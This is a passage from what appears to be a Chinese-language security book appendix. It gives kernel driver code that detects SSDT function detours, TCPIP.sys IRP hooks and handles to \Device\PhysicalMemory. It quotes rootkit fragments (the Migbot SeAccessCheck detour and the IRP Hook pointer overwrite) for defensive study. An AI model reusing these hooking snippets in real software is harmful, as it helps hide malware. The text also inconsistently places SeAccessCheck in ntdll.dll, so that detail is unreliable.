一个16位选择符加上一个16位偏移量(例如JMP 0x1234:0x5512)。 ·ptr16:32 一个16位选择符加上一个32位偏移量(例如JMP 0x1234:0x4412ABCD)。 ·m16:16 一个16位内存地址选择符加上一个16位内存地址偏移。 ·m16:32 一个16位内存地址选择符加上一个32位内存地址偏移。 你可以看到,这有些复杂。我们将必须进行一些指针计算,还要在全局描述符表(GDT)中查找段选择符。记住,GDT是处理器用于维护各种段的内存保护的表格。因此,我们必须查询GDT计算远程调用的有效地址。我们将介绍如何完成这一工作。 对于前两种类型,提供的地址是一个两部分的指针。第一部分(冒号左边的ptr16)是一个指向段选择符的16位指针;这个选择符将指向GDIT表格中包含代码段正确内存及地址的一个项目(该项目可能是数据、调用门和其他类型)。第二部分(冒号右边的16)是选中的段中的16位偏移量。因此,将来自GDT的基地址加上指定的偏移量就得到有效地址(这种转换过程在Inter x86术语学中被称为逻辑-线形地址转换)。这是JMP/CALL指令的参数。 表A-2概述了处理detour所用的函数序言字节的查找表格。 注意:我们没有包括使用间接地址(也就是寄存器或者内存地址)作为操作数的JMP/CALL变种(JMP操作码为0xFF)。还要注意64位体系结构工作方式不同,有些操作码是不允许的(用*表示)。 解释一下表A-2中使用的助记法,项目“远JMP p16:32”意为“远JMP指令,执行时跳转目标是16位选择符定义的远指针和一个32位的偏移值。”这个记法意味着你必须查询GDT查找段选择符p16(16位指针)所指向的段的基地址,并且将其加上冒号右边的16位或者32位地址指定的偏移量。 注意,短JMP仅使用1字节地址作为操作数。因此,我们不用在意这些JMP,它们在模块内跳转。 根据这个查找表格,我们将根据操作码进行以下两个操作之一: 1)如果操作码指的是一个近JMP或者近CALL(0xE8和0xE9),JMP目标将是JMP下一条指令的地址加上操作数(因为地址是相对的)。 2)如果操作码指的是一个远JMP或者远CALL(0xEA和0x9A),解析一个16位段选择符(冒号左边)确定是否必须查询GDT或者LDT以查找段的基地址,这个基地址被加到给定的偏移量上(冒号的右边)。这是JMP或者CALL的目标。 如果你不能全部理解,也不要紧。实现这些操作的代码非常简单,但是解释却不容易(你现在可能了解了)。花费一点时间透彻了解我们在本小节中关于x86体系结构的讨论。还有,一定要看看756页的《Intel编程人员手册》,特别是关于内存保护机制的第5章(http://www.intel.com/Assets/PDF/manual/253668.pdf)。 检测方法 我们已经讨论了一些基础知识,现在让我们进入问题的中心。你如何检测已经被覆盖的函数序言,然后解析恶意的JMP/CALL的地址? 第一步是定义你希望扫描的模块和函数。你的答案根据目标可能有所不同。例如,你希望扫描系统上内存中装入的每个模块中(DLL、内核驱动程序、exe等)的每个输出函数。你更可能希望验证核心系统模块。简单起见,我们将假定模块是ntoskrnl.exe,函数是SeAccessCheck()。我们选择ntoskrnl.exe是因为这可以在前面介绍的SSDT检测代码基础上构建(记住,我们提到过,验证之后如果有一个SSDT项目未被挂钩,下一步是检查函数序言中的detours/修补)。我们选择SeAccessCheck()是因为著名的Rootkit MigBot(由Greg Hoglund开发)在这个函数的序言中安装了一个detour。这样,我们将有很好的测试用例来验证自己的代码。 知道了你所感兴趣的函数/模块之后,我们将把指向这个函数的一个指针传递给detour扫描例程IsFunctionPrologueDetoured()。这个例程将扫描SeAccessCheck的序言,查找头25个字节中的detour。它将使用一个开源反汇编程序识别JMP/CALL例程,然后尝试解析指令的目标。 如果所有工作完成之后,计算出来的JMP/CALL地址指向SeAccessCheck()包含模块(ntoskrnl.exe)的地址空间之外,那么你应该强烈地怀疑这个函数被修补过。 Detour检测代码 现在我们将介绍实现前一小节讨论的检测技术的代码。我们在前面介绍的SSDT检测代码之上构建,这些代码实际上需要为SSDT代码所声明的相同数据结构,在SSDT项目中循环,然后调用一个新函数IsFunctionPrologueDetoured()测试前几个CALL/JMP指令。列举SSDT的主循环在下面列出,我们将分解各个代码块,更深入地解释最重要的部分。 注意,为了简洁,代码片段中的某些函数的源代码(原型和定义)不在这里列出。但是,函数名称是不言自明的,我们将在注释中指出遗漏的信息。而且,整个实用程序包括所有源代码,都可以在本书网站上免费下载(http://www.malwarehackingexposed.com/)。 //loop through SSDT entries for(i=0;i<(int)KeServiceDescriptorTable.ntoskrnl.NumberOfServices;i++) { //get the address of this service function and number of parameter bytes ServiceFunctionAddress=(ULONG) KeServiceDescriptorTable.ntoskrnl.KiServiceTable[i]; ServiceFunctionParameterBytes=(ULONG) KeServiceDescriptorTable.ntoskrnl.ServiceParameterTableBase[i]; //assign the"known good"service function name //which is pulled from a lookup table //i.e.,what service address is normally stored at this index in the ssdt? RtlStringCbCopyExA(ServiceFunctionNameExpected, 1024, GetKGServiceFunctionName((UINT)i), NULL, NULL, 0); 我们应该指出ServiceFunctionNameExpected和ServiceFunctionNameFound这两个变量之间的区别。第一个变量使用前面没有提到的一个查找表输入。这个查找包含根据Windows版本和服务包的所有系统服务程序的已知索引。思路是你根据当前操作系统版本和服务包可以知道应该在SSDT中任何给定索引处的是哪个函数。 这一信息可以从任何能够转储SSDT表格的工具中收集到,如WinDbg(我们使用一些定制的PHP解析脚本下载http://www.metasploit.com/users/opcode/syscalls.html上的数据,并将查找表格格式化为C语言代码)。通过转储所有主要Windows版本和服务包的表格,我们可以建立一个简单的查找表格,供枚举这个特定系统的SSDT时使用。在输出中包括这些信息对于显示预期的SSDT项目和实际的SSDT项目之间的差异很有帮助。 这里,我们将通过解析ntoskrnl的输出表来提取实际SSDT项目的函数名称(也就是变量ServiceFunctionNameFound)。我们为什么要这么做?因为SSDT不包含函数名称,而只有地址、参数和索引。所以我们采用地址来查找在ntoskrnl.exe中的相应输出。当然,这一方法在大部分SSDT项目上注定要失败,因为大部分这些服务函数都没有由内核输出(但是它们可以由内核本身在内部使用)! 下一步是尝试寻找内存中包含给定服务函数地址的装入模块,以便找出包含这个函数的模块: //get the containing module of this service function //by its address in memory if(GetModInfoByAddress(ServiceFunctionAddress,pThisModule)) { RtlStringCbCopyExA(ContainingModule,256,pThisModule->ImageName,NULL,NULL,0); //get the name of the function from the containing module's export table //or if not exported,store[unknown] if(!GetFunctionName(pThisModule->Base, ContainingModule, ServiceFunctionAddress, ServiceFunctionNameFound)) RtlStringCbCopyExA(ServiceFunctionNameFound, 1024, pUnknownBuf, NULL,NULL,0); } //if we can't find the containing module,there's a problem: //(1)ZwQuerySystemInformation()is hooked.We're screwed. //(2)the module was not in the system's module list, // so it was injected somehow.In either case,the user // should suspect something's up from this fact alone. else { RtlStringCbCopyExA(ContainingModule,256,pUnknownBuf,NULL,NULL,0); RtlStringCbCopyExA(ServiceFunctionNameFound,1024, pUnknownBuf,NULL,NULL,0); } 为了确定给定的SSDT入口指向一个被绕开的函数,我们将调用IsFunctionPrologue Detoured(),很快我们将对这个函数作更详细的研究: IsDetoured=IsFunctionPrologueDetoured(ServiceFunctionAddress, ntoskrnl_base, ntoskrnl_size, d); //if it is detoured,we may have found the //containing module that way,so reassign here if(IsDetoured) if(d->detouringModule!=NULL) RtlStringCbCopyExA(ContainingModule,256, d->detouringModule,NULL,NULL,0); DbgPrint("%-3d",i); DbgPrint("%-08X",ServiceFunctionAddress); DbgPrint("%-25.24s",ServiceFunctionNameExpected); DbgPrint("%-25.24s",ServiceFunctionNameFound); 至此,我们有了SSDT信息以及对函数是否被绕开的粗略估计。输出这一信息时,查看我们在函数中检查以确定函数是否被绕开的字节的反汇编结果是有用的。这一过程比简单的操作码检查(例如0x9A是CALL指令)要难得多。实际上,最简单的方法是包含一个来自开源社区杰出的x86反汇编程序。我们选择的是Gil Dabah的diStorm反汇编程序(http://ragestorm.net/distorm/)——我们在此要感谢这个难以置信的轻量级精确反汇编程序的作者!这个免费工具使我们能够反汇编并且显示函数序言的头25个字节,我们用它来确定函数是否被绕开: //if this function has been detoured,output a //disassembly string of up to 25 bytes if(IsDetoured) { DbgPrint("%-10s","YES"); DbgPrint("%-35.34s\n",ContainingModule); //loop through possible decoded instructions DbgPrint("->25-byte disassembly:\n"); for(j=0;j<d->numDisassembled;j++) { DbgPrint("%08I64x(%02d)%s%s%s\n", d->decodedInstructions[j].offset, d->decodedInstructions[j].size, (char*)d->decodedInstructions[j].instructionHex.p, (char*)d->decodedInstructions[j].mnemonic.p, (char*)d->decodedInstructions[j].operands.p); } } else { DbgPrint("%-10s","No"); DbgPrint("%-8s","[N/A]"); DbgPrint("%-5s","[N/A]"); DbgPrint("%-35.34s\n",ContainingModule); } IsFunctionPrologueDetoured()的主要部分如下。这个函数在前一个函数的主循环中列举所有SSDT项目时调用。 //using diStorm open source dissembler,try to disassemble 25 bytes //starting at the function's start address(prologue) if(diStorm_Disasm(FuncAddr,numBytesToDisasm,disassembly,&numDisassembled)) { for(i=0;i<numDisassembled;i++) d->decodedInstructions[i]=disassembly[i]; d->numDisassembled=numDisassembled; } 现在我们已经反汇编了函数序言,将要解析结果信息中的任何JMP或者CALL指令。函数序言中存在这样的指令可能是恶意模块detour的证据。为了减少假阳性,目标在模块地址空间内的detour被认为是良性的。 //loop through resulting 25-byte disassembly and parse any CALL or JMPs for(j=0;j<d->numDisassembled;j++) { doSkipOperand=FALSE; RtlStringCchPrintfW(wstrMnemonic,60,L"%S", d->decodedInstructions[j].mnemonic.p); RtlInitUnicodeString(&uMnemonic,(PCWSTR)wstrMnemonic); //if it is a JMP or a CALL,do further processing if(RtlCompareUnicodeString(&uMnemonic,&uJmpString,TRUE)==0|| RtlCompareUnicodeString(&uMnemonic,&uCallString,TRUE)==0) { //the.operands field is a comma-separated list of up to 3 operands //for JMP/CALL,we don't want any with commas,skip them for(k=0;k<(UINT)d->decodedInstructions[j].operands.length;k++) { if(d->decodedInstructions[j].operands.p[k]==',') { doSkipOperand=TRUE; break; } } //if multi-operand,skip if(doSkipOperand) continue; //first,try to parse a segment_selector:offset //argument to the CALL/JMP //if this fails(i.e.,the argument has no colon), //assume immediate address //Note:GetFarCallData()simply parses the string. if(GetFarCallData(d->decodedInstructions[j].operands.p, d->decodedInstructions[j].operands. length,SegmentSelector,Offset)) { //convert the ASCII CHAR string to WCHAR //then to unicode for comparison RtlStringCchPrintfW(wTargetAddress,15,L"%S",Offset); } //otherwise,fill the target address with the immediate operand else { //convert the ASCII CHAR string to WCHAR //then to unicode for comparison RtlStringCchPrintfW(wTargetAddress,15,L"%S", d->decodedInstructions[j].operands.p); } RtlInitUnicodeString(&uTargetAddress,(PCWSTR)wTargetAddress); //convert the unicode string to a 64-bit integer nt=RtlUnicodeStringToInteger(&uTargetAddress,0,&addr); //if the conversion succeeded,dereference the converted ULONG if(nt==STATUS_SUCCESS) d->TargetAddress=(DWORD)addr; else d->TargetAddress=0;//otherwise,bail. //find the module that owns this target address GetModInfoByAddress(d->TargetAddress,pMod); if(pMod!=NULL) RtlStringCbCopyExA(d->detouringModule,256, pMod->ImageName,NULL,NULL,0); else RtlStringCbCopyExA(d->detouringModule,256, pUnknownBuf,NULL,NULL,0); //if the target of the CALL or JMP is not //in this module's memory address range, //this is a highly suspicious execution flow alteration if(!IsAddressWithinModule(d->TargetAddress, ModuleBaseAddr,ModuleSize)) DetourFound=TRUE; } } 我们刚才展示的代码说明了如何验证SSDT中的系统服务函数没有被绕开。 注意:下面展示的输出来自于我们的驱动程序(以C语言编写)。为了获得这个输出,我们在一个使用Sun的Virtual Box软件的虚拟客户OS中调试操作系统时,在源代码中发出DbgPrint()命令,并在WinDbg中捕捉它。 下面是一个简短的输出列表: 注意,有多少个“找到”的函数列出的状态为未知([unknown]):这意味着这些函数未被内核输出。SSDT中输出的第一个函数是NtAddAtom()。 为了快速测试这段代码,我们安装了Migbot Rootkit,它在SeAccessCheck(ntdll.dll的一部分)的序言中编写了一个detour。为了测试这个detour,我们使用前面讨论的功能编写了一个简短的例程LookForMigbot()。 注意:如果读者希望测试这段代码,必须使用Windows XP(没有服务包)。因为Migbot Rootkit在操作之前首先验证SeAccessCheck来自这个版本的Windows XP。 VOID LookForMigbot() { ULONG SeAccessCheckAddress; DWORD ntdll_base,ntdll_size=0; PDETOURINFO d; PSYSTEM_MODULE_INFORMATION pNtdll; UNICODE_STRING u; int j; //get the address of SeAccessCheck RtlInitUnicodeString(&u,L"SeAccessCheck"); SeAccessCheckAddress=MmGetSystemRoutineAddress(&u); if(SeAccessCheckAddress==NULL) { DbgPrint("\nLookForMigbot():Failed to get the address of SeAccessCheck!"); return; } d=ExAllocatePoolWithTag(NonPagedPool,sizeof(DETOURINFO),MY_TAG); //get module information for ntdll.dll pNtdll=ExAllocatePoolWithTag(NonPagedPool, sizeof(SYSTEM_MODULE_INFORMATION), MY_TAG); if(!GetModInfoByName("ntdll.dll",pNtdll)) { DbgPrint("\nLookForMigbot():Failed to get the address of ntdll.dll!"); return; } //store module location and size for function ntdll_base=(DWORD)pNtdll->Base; ntdll_size=(DWORD)pNtdll->Size; DbgPrint("\nLookForMigbot():Ntdll.dll base address found at%08X", ntdll_base); DbgPrint("\nLookForMigbot():Ntdll.dll size is%ul",ntdll_size); DbgPrint("\nLookForMigbot():Address of SeAccessCheck:%08X", SeAccessCheckAddress); if(IsFunctionPrologueDetoured((DWORD)SeAccessCheckAddress, ntdll_base,ntdll_size,d)) { DbgPrint("\nLookForMigbot():Migbot detected!"); DbgPrint("\nLookForMigbot():Overwritten prologue of SeAccessCheck:\n"); //loop through possible decoded instructions for(j=0;j<d->numDisassembled;j++) { DbgPrint("%08I64x(%02d)%s%s%s\n", d->decodedInstructions[j].offset, d->decodedInstructions[j].size, (char*)d->decodedInstructions[j]. instructionHex.p, (char*)d->decodedInstructions[j].mnemonic.p, (char*)d->decodedInstructions[j].operands.p); } } else { DbgPrint("\nLookForMigbot():Migbot was not detected."); } } 这个函数执行如下任务: ·用MmGetSystemRoutineAddress()获得SeAccessCheck的地址。 ·查找ntdll.dll(包含SeAccessCheck)的基地址和大小。 ·用函数地址、模块基地址、模块大小以及用detour信息填写的DETOURINFO结构调用IsFunctionPrologueDetoured()。 来自干净系统的前一个函数输出如下: DriverEntry():Looking for migbot.. LookForMigbot():Ntdll.dll base address found at 7C900000 LookForMigbot():Ntdll.dll size is 720896l LookForMigbot():Address of SeAccessCheck:805E5848 LookForMigbot():Migbot was not detected. 运行Migbot的migloader(不带参数)修补SeAccessCheck(以及NtDeviceIoControlFile)并输出覆盖的字节: My Driver Loaded!-0x55-0x8B-0xEC-0x6A-0x01-0xFF-0x75 -0x2C-0x55-0x8B-0xEC-0x53-0x33-0xDB -0x38-0x5D-0x24 运行这个检测例程之后,得到的输出显示SeAccessCheck函数序言被覆盖为一条指向Migbot自身的绕开函数的远JMP指令(加重显示): DriverEntry():Looking for migbot.. LookForMigbot():Ntdll.dll base address found at 77F50000 LookForMigbot():Ntdll.dll size is 692224l LookForMigbot():Address of SeAccessCheck:8056FCDF LookForMigbot():Migbot detected! LookForMigbot():Overwritten prologue of SeAccessCheck: 8056fcdf(07)ea 5865af81 0800 JMP FAR 0x8:0x81af6558 8056fce6(01)90 NOP 8056fce7(01)90 NOP 8056fce8(06)0f84 98660000 JZ 0x80576386 8056fcee(03)395d 08 CMP[EBP+0x8],EBX 8056fcf1(06)0f84 a81a0700 JZ 0x805e179f 8056fcf7(01)56 PUSH ESI 注意,远JMP的记法与本附录前面解释的x86分段内存的概念一致。Migbot驱动程序中的C代码精确匹配这一输出(除了已经解释过的、动态修改的0x11223344之外),包括覆盖部分最后的两条NOP指令(操作码0x90): char newcode[]={0xEA,0x44,0x33,0x22,0x11,0x08,0x00,0x90,0x90}; 如果我们用WinDbg反汇编远跳转指令的目标地址(0x81af6558),将会看到Rootkit绕开函数的内容,这个函数的名称为my_function_detour_seaccesscheck(): kd>u 0x81af6558 81af6558 55 push ebp 81af6559 8bec mov ebp,esp 81af655b 53 push ebx 81af655c 33db xor ebx,ebx 81af655e 385d18 cmp byte ptr[ebp+18h],bl 81af6561 eae8fc56800800 jmp 0008:8056FCE8 81af6568 55 push ebp 81af6569 8bec mov ebp,esp 注意在Migbot驱动程序源代码中的匹配: __declspec(naked)my_function_detour_seaccesscheck() { __asm { //exec missing instructions push ebp mov ebp,esp push ebx xor ebx,ebx cmp[ebp+24],bl _emit 0xEA _emit 0xAA _emit 0xAA _emit 0xAA _emit 0xAA _emit 0x08 _emit 0x00 } } 同样,当Rootkit动态地用自己的detour函数调用时跳转回来的位置覆盖占位地址0xAAAAAAAA,这个位置是SeAccessCheck开始位置的9个字节之后(添加9个字节是为了避免无限循环)。确实,我们可以通过将SeAccessCheck地址加上9(从我们自己的检测代码的输出)来验证Rootkit“标记”了正确的地址: 8056FCDF+9=8056FCE8 Rootkit中的对应源代码为: reentry_address=((unsigned long)SeAccessCheck)+9; …… for(i=0;i<200;i++) { if((0xAA==((unsigned char*)non_paged_memory)[i])&& (0xAA==((unsigned char*)non_paged_memory)[i+1])&& (0xAA==((unsigned char*)non_paged_memory)[i+2])&& (0xAA==((unsigned char*)non_paged_memory)[i+3])) { //we found the address 0xAAAAAAAA //stamp it w/the correct address *((unsigned long*)(&non_paged_memory[i]))=reentry_address; break; } } 总结一下,请记住这种技术,和任何启发式技术一样,都可能造成假阳性,纯粹是试验性的。任何检测出来的detour都可能是合法的操作系统热修补。应该对包含修补代码的模块进行进一步分析以了解它究竟是detour还是合法的。 A.3 检测IRP钩子的两个P 现在你知道如何检测一般的指针钩子和修补/绕开的代码,IRP钩子的问题分解为另一个需要验证的数据结构。因此,我们直接跳到代码(这可不是故意的俏皮话!)。 装入的内核驱动程序的列表可以使用前面讨论过的ZwQuerySystemInformation()获得。一旦你拥有了装入驱动程序的列表,就只需要验证其中一个。为了本小节的目的,我们将使用Rootkit.com上的TCP IRP Hook Rootkit来说明这种检测(https://www.Rootkit.com/newsread.php?newsid=846)。这种特殊的Rootkit挂钩运行操作系统TCP/IP协议站的驱动程序TCPIP.sys的IRP_MJ_DEVICE_CONTROL主函数代码的调度例程。这个函数代码是最关键的函数代码之一,因为它是用于与用户模式应用程序通信的一个主要函数。通过挂钩TCPIP.sys中的这个函数代码入口,IRPHook实际上拦截了来自所有用户模式应用程序的网络通信。 创建这个指针钩子的IRP Hook源代码如下(我们为源代码加上了以“HE COMMENT”开头的注释): UNICODE_STRING deviceTCPUnicodeString; WCHAR deviceTCPNameBuffer[]=L"\\Device\\Tcp"; pFile_tcp=NULL; pDev_tcp=NULL; pDrv_tcpip=NULL; RtlInitUnicodeString(&deviceTCPUnicodeString,deviceTCPNameBuffer); //HE COMMENT:this statement retrieves a pointer to the top of //the victim driver's device stack,in this case,\\Device\TCP ntStatus=IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA, &pFile_tcp, &pDev_tcp); if(!NT_SUCCESS(ntStatus)) return ntStatus; //HE COMMENT:This line retrieves a pointer to the DRIVER_OBJECT data //structure for the victim driver,so that we can access the IRP table //member of this data structure in the following line pDrv_tcpip=pDev_tcp->DriverObject; OldIrpMjDeviceControl=pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL]; //if the pointer for the driver's dispatch function for the IRP major code //IRP_MJ_DEVICE_CONTROL is valid,perform a synchronized overwrite of this //pointer,effectively"hooking"all IRPs for that dispatch routine. if(OldIrpMjDeviceControl) InterlockedExchange( (PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)HookedDeviceControl); return STATUS_SUCCESS; 我们的检测代码简单地组合前面讨论过的检测指针钩子和detour修补的技术。函数ExamineDriverIrpTables()调用了这段代码,在核心内存中装入的驱动程序列表中循环直到找到TCPIP.sys: VOID ExamineDriverIrpTables() { PMODULE_LIST pModuleList; UINT bufsize=GetLoadedModuleListSize(); PULONG returnLength=0; CHAR ModuleName[256]; PCHAR nameStart; NTSTATUS nt; int i; //0 buffer size is returned on failure if(bufsize==0) return; //loop through list of loaded drivers pModuleList=ExAllocatePoolWithTag(NonPagedPool,bufsize,MY_TAG); //oops,out of memory…… if(pModuleList==NULL) { DbgPrint("\nExamineDriverIrpTables():[0]Out of memory.\n"); return; } nt=ZwQuerySystemInformation(SystemModuleInformation, pModuleList, bufsize, returnLength); if(nt!=STATUS_SUCCESS) { DbgPrint("\nExamineDriverIrpTables():[0]Error: ZwQuerySystemInformation()failed\n."); return; } //loop through the module list and find owning module of this function address //a module owns it if the function address falls in the module's memory space for(i=0;i<(long)pModuleList->ModuleCount;i++) { nameStart=pModuleList->Modules[i].ImageName+ pModuleList->Modules[i].ModuleNameOffset; memcpy(ModuleName, nameStart, 256-pModuleList->Modules[i].ModuleNameOffset); DbgPrint("\nExamineDriverIrpTables():%s",ModuleName); //if we are on the driver we care about if(strcmp(ModuleName,"tcpip.sys")==0) { IsIrpTableHooked("tcpip.sys", L"\\Device\\Tcp", (ULONG)pModuleList->Modules[i].Base, (ULONG)pModuleList->Modules[i].Size); } } return; } IsIrpHooked()的源代码与前面介绍的SSDT钩子/detour检测代码相同,只有一处主要的例外:我们在驱动程序的IRP表中的28个主要IRP函数代码中循环,而不是SSDT表中的270个项目。每次循环我们都验证指针引用的内存位置在驱动程序中。 下面的输出显示了安装IRP Hook后挂钩的IRP项目(加重显示): ExamineDriverIrpTables():ipsec.sys ExamineDriverIrpTables():tcpip.sys IsDriverIrpTableHooked():IRP Table for tcpip.sys and device\Device\Tcp: ---------------------------------------------------------------------------- IRP_MJ Address Name Hooked?Detoured?DetourAddr Module ---------------------------------------------------------------------------- IRP_MJ_CREATE F70FBD91[unknown]No No[N/A]tcpip.sys IRP_MJ_CREATE_F70FBD91[unknown]No No[N/A]tcpip.sys NAMED_PIPE IRP_MJ_CLOSE F70FBD91[unknown]No No[N/A]tcpip.sys IRP_MJ_READ F70FBD91[unknown]No No[N/A]tcpip.sys IRP_MJ_WRITE F70FBD91[unknown]No No[N/A]tcpip.sys IRP_MJ_QUERY_F70FBD91[unknown]No No[N/A]tcpip.sys INFORMATION IRP_MJ_SET_F70FBD91[unknown]No No[N/A]tcpip.sys INFORMATION IRP_MJ_QUERY_F70FBD91[unknown]No No[N/A]tcpip.sys IRP_MJ_SET_EA F70FBD91[unknown]No No[N/A]tcpip.sys IRP_MJ_FLUSH_F70FBD91[unknown]No No[N/A]tcpip.sys BUFFERS IRP_MJ_QUERY_F70FBD91[unknown]No No[N/A]tcpip.sys VOLUME_INFORMATION IRP_MJ_SET_F70FBD91[unknown]No No[N/A]tcpip.sys VOLUME_INFORMATION IRP_MJ_F70FBD91[unknown]No No[N/A]tcpip.sys DIRECTORY_CONTROL IRP_MJ_FILE_F70FBD91[unknown]No No[N/A]tcpip.sys SYSTEM_CONTROL IRP_MJ_DEVICE_F89EB132[unknown]YES No[N/A]\??\c:\irphook.sys SYSTEM_CONTROL IRP_MJ_F70FBFB0[unknown]No No[N/A]tcpip.sys _DEVICE_CONTROL IRP_MJ_F70FBD91[unknown]No No[N/A]tcpip.sys _DEVICE_CONTROL IRP_MJ_LOCK_F70FBD91[unknown]No No[N/A]tcpip.sys CONTROL IRP_MJ_CLEANUP F70FBD91[unknown]No No[N/A]tcpip.sys IRP_MJ_CREATE_F70FBD91[unknown]No No[N/A]tcpip.sys MAILSLOT IRP_MJ_QUERY_F70FBD91[unknown]No No[N/A]tcpip.sys SECURITY IRP_MJ_SET_F70FBD91[unknown]No No[N/A]tcpip.sys SECURITY IRP_MJ_POWER F70FBD91[unknown]No No[N/A]tcpip.sys IRP_MJ_SYSTEM_F70FBD91[unknown]No No[N/A]tcpip.sys CONTROL IRP_MJ_DEVICE_F70FBD91[unknown]No No[N/A]tcpip.sys CHANGE IRP_MJ_QUERY_F70FBD91[unknown]No No[N/A]tcpip.sys QUOTA IRP_MJ_SET_F70FBD91[unknown]No No[N/A]tcpip.sys QUOTA IRP_MJ_PNP F70FBD91[unknown]No No[N/A]tcpip.sys ExamineDriverIrpTables():netbt.sys ExamineDriverIrpTables():afd.sys ExamineDriverIrpTables():netbios.sys 和预想的一样,IRP Hook Rootkit用地址0xF89EB132覆盖了处理IRP_MJ_DEVICE_SYSTEM_CONTROL函数代码的函数指针。注意,所有其他IRP调度处理函数指向地址0xF70FBD91。对前者进行反汇编显示了Rootkit调度例程的前几个字节,这个例程代替了TCPIP.sys中的合法例程: kd> u F89EB132 *** ERROR: Module load completed but symbols could not be loaded for irphook.sys irphook+0x1132: f89eb132 53 push ebx f89eb133 8b5c240c mov ebx,dword ptr [esp+0Ch] f89eb137 56 push esi f89eb138 8b7360 mov esi,dword ptr [ebx+60h] f89eb13b 803e0e cmp byte ptr [esi],0Eh f89eb13e 755f jne irphook+0x119f (f89eb19f) f89eb140 807e0100 cmp byte ptr [esi+1],0 f89eb144 7559 jne irphook+0x119f (f89eb19f) 要注意的一点是,我们只是验证了驱动程序的IRP函数处理程序表;驱动程序的初始化、卸载、AddDevice()或者其他必要的例程也可能被挂钩。这些指针也应该被验证。 A.4 检测IAT钩子的两个“P” 验证给定模块的输入地址表(IAT)涉及遍历目标进程的装入模块列表和检查所有DLL的输入,确保它们指向给定DLL内的位置。这种方法也组合了我们前面说明过的技术。因此,我们将此留给读者作为练习,使用所提供的代码检测IAT钩子。 A.5 我们的第三种技术:检测DKOM 我们已经介绍了两个“P”的检测方法,现在我们将转向第三种也是最后一种检测技术:通过句柄检查检测DKOM。在本小结中,检测方法仅仅处理试图从用户模式通过修改段对象\\Device\PhysicalMemory来改变内核结构的DKOM变种。这种方法将能对抗使用这个段对象的任何Rootkit,例如那些试图安装调用门的Rootkit和各种其他实例,在VX Heaven(http://vx.netlux.org/vx.php?id=ep12)、《Phrack》杂志(http://vx.netlux.org/vx.php?id=ep12)和The Code Project(http://www.codeproject.com/KB/system/soviet_kernel_hack.aspx)上能找到一些实例。 注意:这种DKOM形式在Windows 2003 Server Service Pack 1之外的系统上无效。 因为DKOM直接在内存中修改数据结构,检测DKOM行为的副作用非常困难。某些形式的DKOM依赖于从用户模式使用段对象\\Device\PhysicalMemory直接写入内存。因此,一种相当基本的检测方法是检查每个进程打开的句柄,查看是否存在指向\\Device\PhysicalMemory的句柄。 Windows中每个可访问资源都由一个对象表示,所有对象由对象管理器管理。对象的例子包括端口、文件、线程、进程、注册表键值以及同步原语(如互斥体、信号量、自旋锁)。在任何给定的时刻,有数千个对象被异步和同步地创建、更新、访问和删除。对象管理器为打开指向对象的句柄的进程和线程处理这些操作。对象在所有打开指向它的进程和线程释放句柄之前不会被释放。这个检测例程将获得一个打开的句柄的列表,并且检查对应对象的名称是否匹配字符串“\\Device\PhysicalMemory”。 注意:对打开的句柄的查询只是一个即时快照,因此检测例程的有效性仅限于检测在获取句柄列表时DKOM Rootkit是否活动。更可靠的检测方法包括注册一个内核模式回调例程,每当指向一个对象的新句柄创建时得到对象管理器的通知。 为了完成这一任务,我们已经编写了一个新的函数FindPhysmemHandles()。这个函数简单地枚举打开句柄的列表,尝试读取每个句柄对应的对象名称。如果名称为“\\Device\PhysicalMemory”,这个进程打开了一个指向该资源的句柄,则它是可疑的。 第一个任务是使用我们的老朋友ZwQuerySystemInformation()获得整个系统范围内打开的句柄列表: VOID FindPhysmemHandles() { PHANDLE_LIST pHandleList; ULONG bufsize=GetInformationClassSize(SystemHandleInformation); ULONG returnLength=0; int nameFail=0,otherFail=0,numFound=0; CHAR ModuleName[256]; PCHAR nameStart; NTSTATUS nt; UNICODE_STRING ObjectName; UNICODE_STRING DevicePhysicalMemory; PVOID Object; int i; //front matter DWORD*buff=(DWORD*)ExAllocatePoolWithTag(NonPagedPool,4096,MY_TAG); RtlInitUnicodeString(&DevicePhysicalMemory,L"\\Device\\PhysicalMemory"); pHandleList=(PHANDLE_LIST)ExAllocatePoolWithTag(NonPagedPool,bufsize,MY_TAG); nt=ZwQuerySystemInformation(SystemHandleInformation, pHandleList, bufsize, &returnLength); if(nt!=STATUS_SUCCESS) { DbgPrint("\nFindPhysmemHandles():[0]Error: ZwQuerySystemInformation()failed.\n"); return; } DbgPrint("\nFindPhysmemHandles():[0]Found%d handles.\n",pHandleList- >HandleCount); 接下来,我们在打开句柄的列表中循环,搜索需要的字符串: //loop through the list of open handles across the system and match any that //have the name\\Device\PhysicalMemory and then inspect the owner of that handle for(i=0;i<(long)pHandleList->HandleCount;i++) { if(GetHandleInfo(pHandleList->Handles[i].ProcessId, (HANDLE)pHandleList->Handles[i].Handle,&ObjectName,&nameFail,&otherFail)) { if(RtlCompareUnicodeString(&ObjectName,&DevicePhysicalMemory, FALSE)==0) { DbgPrint("\nFindPhysmemHandles():Process%d has a handle open to \\Device\PhysicalMemory!.\n", pHandleList->Handles[i].ProcessId); numFound++; } } } if(nameFail+otherFail>0) DbgPrint("\nFindPhysmemHandles():Warning:%i name resolution failures and%i other failures.",nameFail,otherFail); DbgPrint("\nFindPhysmemHandles():Found%i open handles to \\Device\PhysicalMemory.",numFound); ExFreePoolWithTag(pHandleList,MY_TAG); 这个功能的核心在GetHandleInfo()函数中实现,该函数采用存储在SYSTEM_HANDLE_INFORMATION结构(通过ZwQuerySystemInformation()获得的打开句柄列表由这个结构的一个数组组成)中的句柄,并使该进程能够访问对应的对象。这样做是必要的,因为任何来自于打开句柄列表中的特定句柄在进程上下文中毫无意义;它只在获得该句柄的进程上下文中有效。因此,我们必须调用ZwDuplicateObject()在我们的进程地址空间中建立该句柄的一个副本,然后我们才能调用ZwQueryObject()获得对象名称。下面是使我们的进程能够访问该对象的步骤: 1)调用ZwOpenProcess()获得指向拥有所要检查的对象的进程的一个句柄。 2)将第1步中的句柄传递给ZwDuplicateObject(),以获得在进程上下文中有效的相同句柄。然后,我们可以得到对象的名称: 3)调用ZwQueryObject()获得基本信息,具体地说就是类型结构的大小。4)使用第1步的大小调用ZwQueryObject()获得类型信息。 5)调用ZwQueryObject()获得名称信息。 完成这5个步骤的代码如下面的GetHandleInfo()函数中所示: BOOL GetHandleInfo(ULONG pid, HANDLE hObject, PUNICODE_STRING ObjectName, int*nameFailCount, int*otherFailCount) { 